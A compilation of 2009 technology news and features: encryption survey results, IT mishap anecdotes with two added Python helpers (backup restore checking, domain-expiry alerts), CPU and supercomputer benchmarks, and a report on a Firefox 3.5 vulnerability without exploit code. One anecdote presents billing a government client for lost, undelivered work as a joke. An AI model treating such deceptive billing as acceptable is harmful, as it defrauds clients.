The news comes as reporting requirements are becoming more burdensome. For example, a recent change to reporting requirements for healthcare organizations in California has resulted in a flood of data breach reports there.
Businesses can expect closer scrutiny of security issues – and failures – as the government ponders new privacy laws.
The report touts the platform approach to encryption. The use of "encryption applications managed via a platform continues to be a best practice approach to an overall data protection strategy in 2009," said Dr. Ponemon in a statement.
Also today, PGP Corporation released two new products. PGP Portable is designed to help encrypt removable storage devices, while PGP Mobile helps organizations encrypt data on mobile devices. Pricing for the new products was not disclosed.
According to the report, organizations see a need to protect mobile devices. "More than 59 percent of respondents say it is very important or important to encrypt employees' mobile devices – a sign that organizations recognize that valuable data is more mobile than ever," the report said.
Companies are right to be concerned about breaches, the report said, referring to an earlier study by The Ponemon Institute that found that breaches cost businesses, on average, $202 per record and, in total, an average of $6.6 million.
InfoWorld: True IT confessions
by Dan Tynan
It's one of the unwritten laws of physics: At some time or another, everybody screws up.
But when IT pros make mistakes, they don't mess around. Entire buildings go dark. Web sites disappear. Companies grind to a halt. Because if you're going to mess up, you might as well make it count.
"I always tell my guys, hey, you're gonna do stupid stuff," says Rich Casselberry, director of IT operations at Enterasys, a networking systems vendor. "It's OK to do something stupid if you have the wrong information. But if you do something stupid because you're stupid, that's a problem. The trick is to not flip out, which only makes it worse, or try to hide it. You need to figure out how to keep it from happening again."
We've gathered up some of the more egregious examples from IT pros brave enough to share their screwups with us. Backups gone bad, people with admin privileges who probably shouldn't, what can go south when you unplug the wrong equipment – in some cases, we've obscured their identities to spare them embarrassment; other geeks, however, are perfectly willing to own up to their youthful mistakes.
Sure, some of these mishaps are amusing in retrospect. But don't laugh too hard. We know you've probably done worse.
True IT confession No. 1: The case of the mysterious invisible backup
Our first tale of misadventure involves a longtime IT pro who doesn't want his real name used, so we'll just call him Hard Luck Harry.

Harry had his share of mishaps when he started out a decade ago at a major networking equipment maker in the Northeast. There was the time he changed an environment variable that broke everything on his company's financial apps, earning an e-mail from his boss ordering him to "never hack on this system again." Or the time he crashed the company's core ERP system by overwriting /dev/tty. Harry says after he accidentally ripped the company's T1 lines out of the wall with his pager, he was banned from ever reentering the telecom closet.
But the worst one happened after Harry installed an Emerald tape backup system. Did he bother to read the manual? Please. This was child's play. Just load install.exe and let the software do its thing.
It seemed to work perfectly. Four hours later, the first backup completed and everything looked fine.
Fast-forward six months. Harry gets a call late one night at home from one of his work pals. That night's backup tape is completely blank, the friend tells him. Worse, the last four weeks of backups are also blank.
As Harry soon discovered, that particular backup program installs in demo mode by default. Demo mode looked exactly like real mode and even took the same amount of time as an actual backup, but nothing ever got written to tape – a fact that was noted in the manual, which Harry might have seen had he read it.
Fortunately, the company used ADP for payroll processing. ADP shipped back historical payroll records, so the firm lost only a week's worth of data. The bad news? Harry was up until 3 a.m. manually stuffing payroll envelopes, along with his boss, the VP of finance, the entire payroll department, and the company's brand-new CIO, whom he met for the first time that night.
"I got to say, I was pretty popular," he jokes. "I think the only reason they didn't fire me was by that point they had gotten so used to me screwing up, they realized I couldn't do anything right."
Lessons learned? 1. Test the restores, not the backups, says Harry. "No one cares if the backup works; they care if the restore does." 2. Think before you type. 3. Remove your pager (or BlackBerry) before entering the telecom closet, just to be safe.
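Harry's first lesson as a check you can actually run. This is an added example, not Harry's backup product or anything from the original story: it backs a directory tree up to a tar archive, restores that archive into a scratch directory, and compares per-file SHA-256 digests against the live tree, so a backup that ran but wrote nothing (the demo-mode failure above) fails the check as missing files rather than passing as "completed". The sample tree, the `demo_mode` switch that imitates the silent product, and the function names are my constructions.

```python
"""Restore test for a backup: does the archive actually give the files back? (added example)"""
import hashlib
import tarfile
import tempfile
from pathlib import Path


def digest_tree(root: Path) -> dict:
    """Map each file under root (relative path) to its SHA-256 digest."""
    out = {}
    for p in sorted(root.rglob("*")):
        if p.is_file():
            out[str(p.relative_to(root))] = hashlib.sha256(p.read_bytes()).hexdigest()
    return out


def make_backup(src: Path, archive: Path, demo_mode: bool = False) -> None:
    """Write a gzip tar of src. demo_mode imitates a product that runs, takes its time, stores nothing."""
    with tarfile.open(str(archive), "w:gz") as tar:
        if not demo_mode:
            tar.add(str(src), arcname=".")


def verify_restore(src: Path, archive: Path) -> dict:
    """Restore archive into a scratch directory and diff digests against src.
    Returns {"missing": [...], "changed": [...], "extra": [...]}; all empty means the restore works."""
    expected = digest_tree(src)
    with tempfile.TemporaryDirectory() as scratch:
        with tarfile.open(str(archive), "r:gz") as tar:
            try:
                tar.extractall(scratch, filter="data")  # refuse paths that escape scratch
            except TypeError:                           # Python without the filter argument
                tar.extractall(scratch)
        actual = digest_tree(Path(scratch))
    return {
        "missing": sorted(set(expected) - set(actual)),
        "changed": sorted(k for k in expected if k in actual and expected[k] != actual[k]),
        "extra": sorted(set(actual) - set(expected)),
    }


def restore_is_good(src: Path, archive: Path) -> bool:
    return not any(verify_restore(src, archive).values())


def run_demo() -> dict:
    """Build a constructed sample tree, back it up for real and in demo mode, verify both."""
    with tempfile.TemporaryDirectory() as work:
        work = Path(work)
        src = work / "finance"
        (src / "payroll").mkdir(parents=True)
        (src / "payroll" / "june.csv").write_text("emp,amount\n101,2500\n")  # constructed data
        (src / "ledger.txt").write_text("opening balance 42\n")              # constructed data
        real, fake = work / "real.tgz", work / "demo.tgz"
        make_backup(src, real)
        make_backup(src, fake, demo_mode=True)
        return {
            "real": verify_restore(src, real),
            "demo": verify_restore(src, fake),
            "real_ok": restore_is_good(src, real),
            "demo_ok": restore_is_good(src, fake),
        }


if __name__ == "__main__":
    result = run_demo()
    print("real backup restores cleanly:", result["real_ok"])
    print("demo-mode backup restores cleanly:", result["demo_ok"], "missing:", result["demo"]["missing"])
```

Run this as a scheduled job against the previous night's tape or archive and page on anything other than three empty lists; a backup job's own "completed" status is exactly what Harry had, and it said nothing. The `filter="data"` argument is there because restoring into a scratch directory means extracting whatever the archive contains, and a malformed or tampered archive should not be allowed to write outside it.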
True IT confession No. 2: Sometimes it takes a janitor to clean up an IT mess
Late one night in 1997, Josh Stephens was working all alone at his console at a large Midwestern telecom company. Stephens was making changes to the Cisco Catalyst switches at the telco's main customer call center, which was located several states away. That's when the spanning tree protocols hit the fan.

"I'm still not sure exactly how I did it, but I caused some sort of broadcast storm and STP freak-out that locked up not only the switch I was working on but every single switch in that facility," he says. That broadcast storm brought down hundreds of call center users, stranding many of them in the middle of customer calls.
Worse, the switches were "locked hard," requiring a physical power-off and a slow methodical plan to bring them back online, one at a time. The datacenter was hundreds of miles away and had no on-site IT staff, so Stephens did the next best thing: He called maintenance.
"I ended up finding a janitor that had keys to all of my LAN closets and I talked him through (a) which devices were the Catalyst switches, and (b) how to power them off," he says. "I also promised him he wouldn't get fired for helping me."
Though the call center was down for more than an hour, nobody ever found out why or who was behind the glitch, says Stephens, who is now VP of technology and Head Geek (yes, that's the actual title) for SolarWinds, a maker of network management software.
Lessons learned? 1. Don't make changes without scheduling a window for them, even if the changes seem minor, says Stephens. 2. Never conduct a change control event without IT resources near the gear you're changing. 3. Be nice to the janitors. One day they might save your assets.
True IT confession No. 3: Put your hands up and step away from the terminal
One of the unavoidable facts of tech life is that when managers are given administrative rights to complex systems, bad things tend to happen.

Back in the late '80s, Johanna Rothman was director of development for a small, distributed process systems maker in the Boston area. Company management insisted on mandatory overtime for everyone, Rothman included. After three months of this, Rothman and her team were cranky and exhausted, a recipe for disaster.
"One night at 9 p.m., I realize we have a bunch of files to be deleted," she says. "I'm on a Unix system, and the system won't let me delete them. I'm not root. Well, I'm the Director. I have the root password. I log in as root. I start rm -r, the recursive delete, from the directory I know is the right directory. I know this."
After a few minutes, the rm command stops working. Rothman, still busy deleting all the applications, kills the job, calls the IT manager, and explains what she's done.
"He says, 'Move away from the keyboard. I'm coming in to start the restore.' I say, 'I can help. Where are the tapes?' He says, 'Go away. Just leave. I don't need more of your help.'"
The restore takes two days. Rothman says she slept in late on both days and told everyone else on her team to do the same. She also left voicemail apologies to all the developers.
"I think the only reason I didn't get fired is because management was too busy with the crisis to realize what a mess I'd made," says Rothman, who now runs her own IT consulting group and keeps a safe distance from Unix root directories.
Lessons learned? 1. There is no reason for anyone higher than the level of manager to have the root password, says Rothman. 2. Too much overtime makes people tired and stupid. The more tired they are, the stupider they get.
True IT confession No. 4: What can Brown do for you?
Here's one of those rare backup mishaps in which data did in fact get backed up. But what it got backed up to is where things go sour.

Twenty-seven years ago, David Guggenheim had just gotten his first "real job" as biological data manager at an environmental consulting firm in Southern California. At that time, the firm's hardware consisted of a PDP-11 and a time-share IBM 360 mainframe in Los Angeles, accessed via dial-up.
"It was time to archive an important project from the IBM mainframe, so I cracked my knuckles and began pounding out the JCL [Job Control Language] necessary to write our data to tapes that would then be shipped to our office," he says. "I submitted the job, satisfied that our data would be safely backed up."
A few days later a UPS driver poked his head in the door at the firm's office and shouted, "Is there a David Guggenheim here?"
The UPS truck was filled floor to ceiling with boxes, all of them addressed to Guggenheim. He opened the first one. It was full of punch cards. And so were all the rest of them.
"It was our data from the IBM mainframe," he says. "To my horror, I realized that instead of specifying output to magnetic tape, I specified output to punch cards. I can't remember my JCL very well any more, but as I recall, it was the difference between specifying '=0' versus '=1.' I was absolutely humiliated."
It gets worse. A few days after the entire staff got involved clearing enough floor space for the mountain of boxes, the bill arrived. The cost of a punch-card backup job was nearly $1,000 (and remember, we're talking about 1982 dollars here).
"I had blown our budget out of the water, killed a forest, and still failed to back up our data onto tape," says Guggenheim, who's now Dr. David Guggenheim, Ph.D., president of 1planet 1ocean, and a senior fellow at The Ocean Foundation. "I've spent my career since then doing environmental work, so hopefully I paid penance for the dead trees."
Lessons learned? 1. Little mistakes can cause huge problems, so keep checking until it hurts. 2. Immediately own up to your errors; humility is a great teacher. 3. Take the time to appreciate the humor of a colossal screw-up, says Guggenheim. "It does wonders for the sting."
True IT confession No. 5: Unplug at your own risk
Back in the mid-'90s, Jan Aleman was interim IT manager for a major telecom company in the Netherlands. He was called in to replace a CTO who'd left under less-than-voluntary circumstances. Before the ex-CTO got canned, though, he'd ordered a $300,000 IBM failover system for the company's mission-critical billing engine.

"A very good IBM salesman had sold them this overpriced hardware, assuring them that if the primary system failed it would rollover seamlessly to the secondary one," says Aleman. "He said it was completely redundant, that nothing could go wrong. I said, 'All right, let's see if it actually works.'"
So Aleman yanked the power plug for the primary system out of the wall, right in front of the IBM salesman. All the company's core systems went dark. The critical billing engine was down for the rest of the afternoon. The phone switches still worked, but nobody in the back office could get anything done.
Though the failover system was installed and running, nobody had bothered to test it. So the next thing Aleman did was institute biweekly tests of the system on weekends.
"I unplugged the company," says Aleman, who is now CEO of Servoy, a developer of hybrid (SaaS and on-premises) software. "Needless to say, they were not very happy, but nothing bad ever happened to me. I'm still not sure how I managed to pull that off."
Lessons learned? 1. Always test systems before you bet the company on them (repeat as needed). 2. Think twice before you yank that power cord.
True IT confession No. 6: Never let another be the master of your domains
Back around 2003 or so, "Fred" (not his real name) was the IT manager for a regional cable company in the Midwest. At the time, the company had about 35,000 subscribers. To boost its business services, it decided to become a domain name reseller for Network Solutions.

As part of the transition to domain name sales, the company redirected all domain renewal notifications to a person in its business support unit. "We assumed only our customer's domain notifications would go there, and not the company's own domains," Fred says. But as the saying goes, assuming makes asses out of everyone.
Sure enough, one night around 10 p.m. everything at the ISP stopped working: DNS, e-mail, the company's own Web sites, and the sites it hosted for its business customers – all simply went poof.
The problem? The ISP had neglected to renew its own domains. The person in business support assumed Fred was also getting notified about the renewals (he wasn't) and Fred assumed that since he wasn't being notified, everything was hunky dory (it wasn't).
"By the time we diagnosed the problem – because you rarely think to check whether your own domain has expired – we had fallen out of the root servers and it took a full 24 hours before everything was restored," says Fred. He adds a variant on the old MasterCard commercials:
1) Domain renewal: $9.99
2) Late-night tech support call: $0.00
3) Breaking Internet connectivity and e-mail for 35,000 people in your hometown: Priceless.

Lessons learned? 1. Always have multiple people receiving important alerts. 2. Register your domains for 10 years and it will most likely be the next guy's problem.
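Fred's first lesson as a check that does not depend on the registrar's e-mail reaching the right person. This is an added example and not the cable company's tooling: it parses WHOIS-style output for a few common expiry fields, works out days remaining, and emits alert records addressed to every recipient on a list, refusing to run at all with fewer than two. The WHOIS excerpts are constructed, the domains are hypothetical, and the field names and date formats covered are my assumptions about what registrars return; fetching the live record (for example with the whois command) is left to the caller.

```python
"""Domain-expiry check that cannot quietly depend on one person's mailbox (added example)."""
from datetime import date, datetime

# Expiry field names seen in WHOIS output (assumed set, compared case-insensitively).
EXPIRY_KEYS = {
    "registry expiry date",
    "registrar registration expiration date",
    "expiration date",
    "expiry date",
    "paid-till",
}
DATE_FORMATS = ("%Y-%m-%dT%H:%M:%SZ", "%Y-%m-%d", "%d-%b-%Y", "%Y.%m.%d")


def parse_expiry(whois_text: str):
    """Return the expiry date found in WHOIS output, or None if no known field parses."""
    for line in whois_text.splitlines():
        key, _, value = line.partition(":")
        if key.strip().lower() not in EXPIRY_KEYS:
            continue
        value = value.strip()
        for fmt in DATE_FORMATS:
            try:
                return datetime.strptime(value, fmt).date()
            except ValueError:
                continue
    return None


def check_domains(whois_by_domain: dict, today: date, warn_days: int = 30, recipients=()) -> list:
    """Return alert records for domains that are expired, expiring within warn_days, or unparseable.
    Refuses to run with fewer than two distinct recipients."""
    recipients = sorted(set(recipients))
    if len(recipients) < 2:
        raise ValueError("expiry alerts need at least two distinct recipients")
    alerts = []
    for domain, text in whois_by_domain.items():
        expiry = parse_expiry(text)
        if expiry is None:
            status, days_left = "unknown", None   # a record you cannot parse is itself worth a page
        else:
            days_left = (expiry - today).days
            if days_left < 0:
                status = "expired"
            elif days_left <= warn_days:
                status = "expiring"
            else:
                continue
        alerts.append({"domain": domain, "status": status, "days_left": days_left, "to": recipients})
    return alerts


# Constructed WHOIS excerpts for four hypothetical domains (not real lookups).
SAMPLE_WHOIS = {
    "example-isp.net": "Domain Name: EXAMPLE-ISP.NET\nRegistry Expiry Date: 2009-07-20T04:00:00Z\n",
    "customer-one.com": "Domain Name: CUSTOMER-ONE.COM\nExpiration Date: 2010-01-15\n",
    "hosted-shop.org": "Domain Name: HOSTED-SHOP.ORG\nRegistry Expiry Date: 2009-06-30T00:00:00Z\n",
    "oddball.example": "Domain Name: ODDBALL.EXAMPLE\nStatus: ok\n",
}


def run_sample(recipients=("noc@example-isp.net", "fred@example-isp.net")) -> list:
    """Run the check over the constructed sample as of 9 July 2009."""
    return check_domains(SAMPLE_WHOIS, date(2009, 7, 9), warn_days=30, recipients=recipients)


if __name__ == "__main__":
    for a in run_sample():
        print(f"{a['domain']:<18} {a['status']:<9} days_left={a['days_left']} to={', '.join(a['to'])}")
```

Point the dictionary at the company's own domains as well as the customers', run it daily from cron, and route the output to a shared alias plus at least one named person; the "unknown" status is deliberate, because a registrar changing its output format is the other way this check goes silent.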
True IT confession No. 7: Don't ask, don't tell, and don't let them make you take a polygraph
Four years ago "Paul" (not his real name), an independent data analyst in (yes) the Midwest, was working with a governmental client on a $20,000 analysis project. After two months of hard work, he delivered a preliminary draft to the client, then went off on a week-long business trip.

Before he left, Paul burned a disc with all the project data on it so that he could finish it up in the hotel during his trip. And as was his usual custom at the time, he deleted all 4GB of project data from his hard drive to free up space.
Then, of course, he lost the disc: $20,000 worth of work gone in a flash. What did he do? What any smart consultant would do: He billed the client for the entire project, in full. And promptly received a check.
"Six months went by and I didn't hear back from the client," says Paul. "I thought that was incredible, because I expected to receive comments and changes on the draft. A year went by, and nothing."
Finally, two years after delivering the draft, the dreaded call finally came.
"'Are you going to ever finish this project?' I heard on the other end of the phone," says Paul. "I said, 'There's no way that I can stand by that original data and recommendations, since two years have gone by. None of the information is valid anymore.' Of course, I knew full well I could never provide any updated data or updated recommendations based on the original data. Fortunately, the client accepted that explanation and then proceeded to discuss what fees I'd need for some new work."
In his defense, Paul says the preliminary draft was 95 percent complete, and the client told him they'd already implemented many of the recommendations he'd made.
These days, Paul is a self-proclaimed "data backup nut."
"On any given day I have about 10 copies of all current project data, and can completely restore every project data file that I have worked on during the last three years within about five minutes," he says. "I learned a hard lesson that I certainly won't forget anytime soon."
Lessons learned? 1. You can never have enough backups. 2. It's a good idea to also keep hard copies on hand, just in case. 3. If you do lose all your data before you've delivered the final product, try to make sure you're working for the government at the time. They might never notice.
TheRegister: Nehalems make like elephants on HPC memory test
by Timothy Prickett Morgan
Intel's Nehalem EP chip has significantly outperformed AMD's Istanbul on a set of memory-intensive benchmark tests.
The techies at supercomputer cluster maker Advanced Clustering Technologies are at it again, running their own benchmarks on single server nodes using popular high-performance computing tests normally used on entire clusters. This time around, ACT is putting the latest x64 chips into two-socket systems and running the Stream memory benchmark on the boxes.
By running various HPC tests on single servers, ACT is helping educate customers on the pros and cons of the new Intel quad-core 'Nehalem EP' Xeon 5500 and Advanced Micro Devices six-core 'Istanbul' Opteron 2400 processors.
A few weeks ago (http://www.theregister.co.uk/2009/06/25/act_super_duke_out/), ACT cluster engineer Shane Corder published a report (http://www.advancedclustering.com/company-blog/high-performance-linpack-on-xeon-5500-v-opteron-2400.html) after he slapped the Linpack Fortran benchmark test on two-socket servers using these new chips.
On that test, one of ACT's Pinnacle rack servers equipped with two quad-core 2.66 GHz Xeon X5550s with 12 GB of DDR3 main memory running at 1.33 GHz was able to deliver 74.03 gigaflops of sustained performance against a peak theoretical performance of 85.12 gigaflops. But a Pinnacle machine configured with two of the six-core Opteron 2435 processors running at 2.6 GHz and 16 GB of DDR2 main memory running at 800 MHz was able to deliver 99.38 gigaflops (against a peak theoretical performance of 124.8 gigaflops).
So, AMD won that one - especially when you consider that the Opteron-based Pinnacle HPC node from ACT cost $3,500 compared to the $3,800 price on the Xeon-based Pinnacle box.
Now, with the Stream benchmark, the test is not about flops so much as memory bandwidth, and given the higher clock speed of the DDR3 main memory compared to DDR2 memory, you'd expect the Nehalem EP server node to do better than it did on the Linpack test. And indeed it did.
Corder's home-done Stream benchmark tests (http://www.advancedclustering.com/company-blog/stream-benchmarking.html) were done on exactly the same iron as the Linpack tests, and for good measure, Corder tossed in some numbers for older quad-core Xeons and Opterons to show how much better the new chips are versus the old.
The Nehalem EPs really cleaned the Istanbuls' clocks on this test. Using 1.33 GHz DDR3 memory, the server using the X5570 processors was able to deliver 37,122 MB/sec of bandwidth on the Stream test, while the same machine equipped with 1.07 GHz memory modules hit 32,770 MB/sec and one using 800 MHz memory could handle 25,490 MB/sec. A Pinnacle server equipped with the earlier "Harpertown" Xeon 5400s, quad-core chips using the old frontside bus architecture and 800 MHz DDR2 main memory, could only deliver 9,776 MB/sec of bandwidth on the Stream test, and dropping down to 667 MHz memory pushed performance down to 6,102 MB/sec.
By contrast, and this is a big contrast, the Istanbul-based Pinnacle server using 800 MHz DDR2 main memory (as fast as it gets for that platform) topped out at 20,534 MB/sec of memory bandwidth on the Stream tests, which was actually a little bit lower than the results ACT saw with a Pinnacle server equipped with quad-core "Shanghai" Opterons, which came in at 20,687 MB/sec. A server using the older quad-core "Barcelona" Opterons and 667 MHz DDR2 main memory was able to deliver 16,965 MB/sec on Stream.
As Intel has promised, ACT confirms that the Nehalem EP chips and their new QuickPath Interconnect bus architecture delivers nearly four times the memory bandwidth as its Harpertown predecessors, and nearly double the memory performance of the current crop of AMD Opterons. And there is nothing AMD can do about it until it switches to DDR3 main memory early next year (http://www.theregister.co.uk/2009/04/22/amd_istanbul_forward/) with the "Magny-Cours" and "Lisbon" kickers to the Istanbuls.
AMD will be offering the G34 socket with four DDR3 memory channels per socket (up to twelve DIMMs) and the C32 socket with two channels per socket (up to four DIMMs). AMD's plan is to offer two different kinds of two-socket servers: one where memory bandwidth is key (that's the G34) and one where cheaper price and floating point or integer power are more important (that's the C32). AMD has the right idea. But it really needs this architecture to be here now to blunt Intel's considerable memory bandwidth advantage. ®
InfoWorld: Because Google says so
by Eric Knorr
I'm not the first to say this, but the idea behind Google's forthcoming Chrome OS reminds me of the Network Computer (NC), a driveless desktop unveiled by Larry Ellison in 1996. Back then, here's what I wrote about NC: "Do you really want to do without a floppy, hard, or CD-ROM drive? Be unable to compute – or even access your data – when the server goes down? Watch performance slow to a crawl during peak hours? An Internet appliance has everyman appeal at first glance; but on closer inspection, it's two steps back to those bad old mainframe days when Big Brother owned the computer, not you."
Now, 13 years later, Google has raised a similar proposition: an OS that pretty much dictates that you'll be living your computing life on the Internet and storing your data and preferences there, too. So let's break down that hoary old critique of mine and see if it still applies.
First of all, when I knocked the NC for lacking local storage, I was referring mainly to performance. At the time, 28.8Kbps modems were typical and putting personal storage at the end of such a slender connection seemed like a really bad idea. Now, some Chrome OS computers will have solid-state drives or hard disks, and some may only have a cache (who knows?), but it doesn't matter much. You'll be computing in the cloud. Broadband plus a fast JavaScript engine equals good enough performance, so score one for Google.
Now we come to the part about being unable to compute or access your data when the "server" goes down. (It could be the "server" or it could be the connection, but whatever.) Well, I imagine some implementation of Google Gears will be included, so you'll have some limited offline access to data. But more to the point, I can't remember the last time my work or home broadband connections went down and Google doesn't have outages. So Google gets another two points.
The reference to "peak hours" is a legacy of the days when mainframes or "online services" would choke on too many simultaneous users. But I believe in the magic of Google's hyperscalable server cloud, so I have to give 'em another one.
Which leads us to the final "Big Brother" point. Google is already the gatekeeper of the Internet; should it also be the keeper of your data? It does seem to be time to trot out the old cliché about absolute power corrupting absolutely. At the very least, I can't imagine enterprises ceding their data to Google (the SLAs on Google Apps, for example, aren't exactly business class).
But a near-zero-config thin client, with all my data and preferences available from any Chrome OS device, is an awfully appealing idea. And if I had my choice, who would I want to play host? Oracle? Microsoft? IBM?
Well, I'm not ready to hand over the entire casket of family jewels to Google, either. But the technical hurdles to a modern-day NC have largely been vaulted, and HTML 5 and CSS 3 should enable desktop-class apps in the browser. The fact that I'm even considering what data I might or might not "give up" – and that a simple announcement implying no new groundbreaking technology has caused such an avalanche of speculation – is testament to the power of the Google brand. Should it be any more powerful than it is?
CNet: Smile at work-or the happiness detector will ding you
by Kelvin Low
Remember the gender recognition system we saw at the Singapore-based CommunicAsia trade show last month? Well, those zany Japanese have a more creative way of implementing a somewhat similar face recognition software.
Putting a new spin on the phrase "service with a smile," employees of Keihin Electric Express Railway will need to check their smiles in every morning. The software will determine the quality of their smile, and display visual alerts if they don't look happy enough.
According to an article in the Mainichi Daily News, the software assigns smile values to various parts of the face. It then adds those values up and determines a score.
The device recognizes eye movements, lip curves, and wrinkles. If an employee gets a low score, messages such as "You still look too serious" or "Lift up your mouth corners" will be displayed on the screen.
Maybe it seems cruel, but to us it's still a lot more humane than not having chairs at work. Or maybe Keihin Electric Express Railway was inspired by the ancient Chinese proverb "Hide your dagger behind a smile"? We wouldn't want to provoke them to find out.
TheRegister: Supers get greener
by Timothy Prickett Morgan
The Top 500 ranking of the world's supercomputers, put out by a group of performance-loving nerds, came out a few weeks ago. Now a few efficiency-loving nerds have added power-consumption figures to the Top 500, resorted the list, and have created the Green 500 supercomputer ranking.
The pursuit of hundreds of teraflops and now tens of petaflops comes at a price, and that price includes power consumption and heat dissipation. Some supercomputer architectures are more power-efficient than others, as the Green 500 rankings clearly show.
The Top 500 list is compiled by Erich Strohmaier and Horst Simon of the Lawrence Berkeley National Laboratory, Jack Dongarra of the University of Tennessee, and Hans Meuer of the University of Mannheim. The list has been published twice a year for nearly 17 years, and Dongarra has Linpack Fortran benchmark test results that were run on Jacquard looms back in the 19th century.
OK, I'm exaggerating. Slightly.
The Green 500 list is a much more recent development. Created by Wu-chun Feng and Kirk Cameron of Virginia Tech, this is the fifth ranking, but only the third one that has been made public.
The most efficient supercomputer on the Green 500 list is a fairly modest 2,016-core cluster based on IBM's PowerXCell 8i processors (in its QS22 blade servers) that employs InfiniBand to lash the server nodes together.
This machine, installed at the University of Warsaw's Interdisciplinary Centre for Mathematical and Computational Modeling, is rated at a modest 18.6 teraflops, but because it only burns 34.6 kilowatts of electricity, it comes in at 536.2 megaflops per watt. And that's thanks in large measure to its using the new 4GHz Cell chip all by itself instead of the 3.2GHz variant paired with dual-core Opteron processors, as do a number of other efficient supers.
Because Warsaw's Cell-based machine - which ranked number one in the November 2008 Green 500 list as well - is so small in terms of teraflops, it probably won't be on the November 2009 list of Top 500 supers, a fate that will drop it from the related Green 500 rankings.
It won't be the first to be so bumped. Three Cell-based machines installed at Spanish oil company Repsol YPF that once ranked at the top of the Green 500 list disappeared from the June 2009 ranking because they were only rated at 14 teraflops, but they delivered 530.33 megaflops per watt since they only burned 26.4 kilowatts of juice.
It looks like it's time for the Top 500 and Green 500 people to start building a larger list so that efficient machines don't get shaken out of the mix.
As was the case in the prior two Green 500 rankings, IBM's hybrid supers composed of Opteron LS21 blades and QS22 Cell blades dominate the energy-efficient rankings, holding spots two through four.
Notably, IBM's "Roadrunner" hybrid Opteron-Cell super installed at Los Alamos National Laboratory, the first machine to break the one-petaflop barrier, is ranked number four on the Green 500 list, showing that Big Blue can build small machines that deliver good energy efficiency, then scale them up and still offer efficiency.
The Roadrunner box, which is rated at 1.1 sustained petaflops on the Linpack test, burns 2.5 megawatts of electricity for an efficiency of 444.9 megaflops per watt. The smaller Opteron-Cell clusters ranked above Roadrunner on the Green 500 list installed at IBM's own benchmarking center and at Los Alamos are rated at 458.3 megaflops per watt.
A whole bunch of BlueGene/P massively parallel clusters of various sizes and installed all over the world occupy slots six through 19 on the Green 500 list, with efficiencies that range from 364 to 371.7 megaflops per watt. The new iDataPlex machines from Big Blue (which have some attributes of blade and rack servers) hold some spots in the list at around 270 megaflops per watt.
The most interesting new machine on the Green 500 list is the Grape-DR cluster, which is a custom supercomputer based on a 256-core chip that was developed by the University of Tokyo, the National Astronomical Observatory of Japan, the Institute of Physical and Chemical Research, and telecom giant NTT.
The Grape-DR machine, which is installed at the observatory, is composed of 8,192 Grape-DR chips running at a modest 330MHz and running CentOS Linux. Each, however, delivers 10.3 gigaflops of oomph, allowing the Grape-DR cluster to hit just under 22 teraflops with nearly 2.1 million cores.
The Grape-DR cluster, which is but the latest in a line of custom supers based on custom chips designed in Japan since 1992, only burns 51.2 kilowatts, allowing it to boast a rating of 428.9 megaflops per watt on the Green 500 ranking. Its number-five position slots it right between IBM's hybrid Opteron-Cell boxes and the wall of BlueGene/P machines.
The most efficient x64-only boxes on the list are based on Intel's new Xeon 5500 Nehalem EP processors, and include not only the IBM iDataPlex boxes but also a machine ranked at number 20 built by NEC for the University of Stuttgart, as well as two boxes built by Atipa for two different atomic labs in the States that almost certainly will be knocked from the list next time around if they're not upgraded.
Cray XT4 and XT5 and SGI Altix ICE parallel supers, as well as a mix of BlueGene and iDataPlex machines from IBM, dominate the top 100 on the Green 500 list, along with a smattering of clusters built from x64 servers from Dell, Sun Microsystems, and Fujitsu. There is not one HP machine in the top fifth of the Green 500 rankings.
Averaged across the entire Green 500 list, the researchers who put together this power ranking say that the efficiency of the machine increased by 10 per cent, from 98 to 108 megaflops per watt, since the November 2008 ranking, while the aggregate power of all the boxes on the list also increased by 15 per cent, from 200 to 230 megawatts.
The power bill is not going down so much as the performance levels are going up.
In the November 2008 Top 500 and Green 500 lists, the aggregate performance of the machines ranked was just under 17 petaflops, but in the June 2009 lists it rose to 22.6 petaflops. In general, Feng and Cameron say that there are more machines above the 200 megaflops per watt threshold and fewer machines below the 50 megaflops per watt level. Moreover, quad-core and six-core processors are helping to boost the energy efficiency of clusters.
The absolute worst supercomputer on the Green 500 ranking is installed at an unnamed IT service provider that has six different blade server clusters based on various generations of x64 blade servers from HP. The cluster in question, which is ranked at 311 on the Top 500 supers list, has 8,192 Opteron cores using 2.4GHz dual-core Opterons and is rated at just over 21 teraflops. Unfortunately, the Green 500 power experts reckon that this box burns 1.6 megawatts of juice, giving it a rating of a hair over 13 megaflops per watt.
That's twice as bad in terms of energy efficiency as the Sun Tsubame Opteron blade cluster located at TiTech in Japan, which uses ClearSpeed co-processors to boost the number-crunching power, but which nonetheless ranks at an embarrassing 494 on the Green 500 list because it consumes 3.3 megawatts to deliver its 87 teraflops, for a rating of 26.4 megaflops per watt.
The Cray XT4 installed at the University of Edinburgh also ranked poorly in terms of energy efficiency, with the 54.65 teraflops Opteron cluster burning 2.6 megawatts of juice and delivering only 21 megaflops per watt. ®
InfoWorld: Firefox 3.5's first vulnerability 'self-inflicted,' says scientist
by Gregg Keizer
Mozilla yesterday confirmed the first security vulnerability in Firefox 3.5, and said the bug could be used to hijack a machine running the company's newest browser.
A noted Firefox contributor called the situation "self-inflicted," and said it was likely that the hacker who posted public exploit code Monday became aware of the flaw by rooting through Bugzilla, Mozilla's bug- and change-tracking database.
The vulnerability is in the TraceMonkey JavaScript engine that debuted with Firefox 3.5, said Mozilla. "[It] can be exploited by an attacker who tricks a victim into viewing a malicious Web page containing the exploit code," the company's security blog reported Tuesday.
Secunia, a Danish security company, rated the bug "highly critical," the second-highest threat ranking in its five-step system, and added that the vulnerability is in TraceMonkey's processing of JavaScript code handling "font" HTML tags.
Older versions of Firefox, including Firefox 3.0, are not vulnerable, according to a message posted by Asa Dotzler, Mozilla's director of community development, in a comment to the company's blog.
"Mozilla developers are working on a fix for this issue and a Firefox security update will be sent out as soon as the fix is completed and tested," said that same blog.
In lieu of a patch, users can protect themselves by disabling the "just-in-time" component of the TraceMonkey engine. To do that, users should enter "about:config" in Firefox's address bar, type "jit" in the filter box, then double-click the "javascript.options.jit.content" entry to set the value to "false." The popular NoScript add-on will also ward off attacks.
The hacker who published exploit code on the milw0rm.com exploit archive Monday was not the first to uncover the vulnerability: Mozilla developers first noted the flaw last Thursday, and were in the middle of working on it when the attack code appeared.
"Looking at the exploit code and our test cases, I think this is self-inflicted and we should have hidden the bug earlier," argued Andreas Gal on Bugzilla. Gal is a project scientist at the University of California, Irvine, where the technique called "trace trees" was developed. Firefox 3.5's TraceMonkey engine is based on that technique, and builds on code and ideas shared with the open-source Tamarin Tracing project.
